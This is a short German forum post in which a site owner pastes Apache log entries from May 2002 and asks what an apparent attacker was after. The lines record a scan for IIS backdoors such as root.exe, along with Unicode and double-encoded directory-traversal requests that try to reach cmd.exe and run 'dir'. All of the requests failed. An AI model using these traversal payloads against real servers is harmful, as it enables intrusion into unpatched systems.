Hallo!!
Ich hab da in meinem Apache Logfile folgende Zeilen gefunden. Das deutet auf Anfragen auf Windows hin. Was wollte der „Angreifer“??
xx.xx.115.166 - - [02/May/2002:21:49:22 +0100] „GET /scripts/root.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:49:29 +0100] „GET /MSADC/root.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:49:31 +0100] „GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:49:34 +0100] „GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:49:37 +0100] „GET /scripts/…%255c…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:49:42 +0100] „GET /_vti_bin/…%255c…/…%255c…/…%255c…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:49:45 +0100] „GET /_mem_bin/…%255c…/…%255c…/…%255c…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:49:47 +0100] „GET /msadc/…%255c…/…%255c…/…%255c/…%c1%1c…/…%c1%1c…/…%c1%1c…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:49:49 +0100] „GET /scripts/…%c1%1c…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:49:52 +0100] „GET /scripts/…%c0%2f…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:49:55 +0100] „GET /scripts/…%c0%af…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:49:57 +0100] „GET /scripts/…%c1%9c…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:50:00 +0100] „GET /scripts/…%%35%63…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 400 690
xx.xx.115.166 - - [02/May/2002:21:50:03 +0100] „GET /scripts/…%%35c…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 400 690
xx.xx.115.166 - - [02/May/2002:21:50:05 +0100] „GET /scripts/…%25%35%63…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
xx.xx.115.166 - - [02/May/2002:21:50:07 +0100] „GET /scripts/…%252f…/winnt/system32/cmd.exe?/c+dir HTTP/1.0“ 404 763
